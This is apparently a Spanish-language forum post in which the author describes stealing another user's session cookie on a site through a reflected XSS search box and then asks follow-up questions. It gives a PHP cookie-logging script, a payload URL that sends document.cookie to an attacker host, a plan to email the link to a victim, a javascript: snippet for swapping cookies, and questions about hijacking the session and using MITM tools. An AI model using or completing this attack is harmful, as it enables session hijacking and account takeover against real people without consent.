Robo de cookie de sesion del sitio vulnerable.com, sitio en el que yo ya soy usuario registrado y también lo es la victima...
-Primero encontramos una caja de Buscaqueda vulnerable.
-A continuacion vamos a crear una pagina en php, este archivo creará otro (archivo.txt) que nos mandará la cookie victima, el archivo a crear es robo.php, con este codigo:
<?
$cookie = $_GET['cookie'];
$fff = fopen("archivo.txt","a");
fwrite($fff, "$cookie \n");
fclose($fff);
?>
-Luego crear la url que al ser clikeada mandará la cookie victima a nuestro archivo.txt
http://www.vulnerable.com/buscador.php?palabra=<script>window.location='http://www.atacante.com/robo.php?cookie='+document.cookie;</script>&buscar=;
le mandamos el link a su email, está lo recibira y al dar click nos apoderaremos de su cookie.
-Luego falsificar el valor de nuestra cookie por el valor que le robamos a la victima, y listo.
------------Aqui es donde tengo este monton de preguntas:
------------
1-Para que funcione el ataque: ¿la victima tien que estar logueada primero en vulnerable.com luego se va a revistar su email y ejecuta el link maligno, ó el ataque funcionaría de todos modos si la victima solo llega a conectarse y lo primero y único que hace es abrir su email y hacer click en el link maligno, sin estar logueada en su cuenta de vulnerable.com??
2-En el código del archivo robo.php (que guardara el valor de la cookie robada en un fichero) se debe utilizar la función $_GET['cookie'], pero otros usan la función $_REQUEST, no hay problema? es lo mismo, verdad?
3-Siguiendo en el código de robo.php ¿de que manera mi server que soporta php debe tener configurado su php.ini, hay problema si su php.ini tiene configuradas las variables
globales asi: register_globals OFF? o en el codigo de robo.php no importa si las variables globales están en ON ó en OFF?
4-haciendo uso de un script que se coloca en la barra de direcciones del navegador puedo ver el contenido de mi cookie
"javascript:void(document.cookie=prompt("Modifica el valor de la cookie",document.cookie).split(";"));"
que es una cadena de caracteres sin sentido! Me imagino que en el archivo.txt donde se escribirá la cookie robada, será ésta cadena de caracteres parecida a la mia, no?, es asi?
4.1 En caso de que sean las cadenas similares, para evitar un ataque Man In The Middle, ¿puedo copiar esa cadena (cookie) victima, luego escribir el script en mi barra de direcciones para ver mi cookie actual de mi cuenta en vulnerable.com y luego borrar la cadena que constituye mi cookie y pegar la cadena de caracteres que constituye la cookie de la victima, y al dar click a Aceptar, estaré logueado como la victima?
4.2 Si es que funciona este reemplazo de cadenas, la mia actual por la que me llego al archivo cookies.txt (que es la cadena que constituye la cookie de la victima), primero debo estar logueado en vulnerable.com como yo (atacante) y en la misma ventana hacer el cambio de cadenas cookies, y luego aceptar y listo? ya estaría hecha la falsificacion de sesion..?
5 En caso de lo que arriba no funcione como puedo hacer un ataque Man in the Middle que programa de facil uso puedo usar? Este ataque MITM con el objeto de interceptar y editar las cabeceras HTTP para el cambio de cookies.. (eso de cabeceras y mitm, no me queda claro)
6-Durante todo este proceso en que capturo la cookie victima, hasta el final del MITM, ¿la victima debe estar online logueada en su sesion de vulnerable.com?, pero si está logueada mientras yo me robo y uso su cookie, ¿vulnerable.com permitiría que el mismo usuario este logueado dos veces en el mismo momento? ¿O en que parte del proceso del ataque la victima debería desconectarse?, sí es que tiene que hacerlo..... porque las cookies tienen
un tiempo en que expiran no? es decir si me robo la cookie de algun usuario, bueno pues, esta no me va a servir de por vida, es decir que me servirá una hora? dos horas? un día?,
por lo que la victima tiene que activarme su cookie durante un tiempito para que cuando me la robe, y la use, no haya expirado, no??
Saludos y de antemano gracias por las respuestas...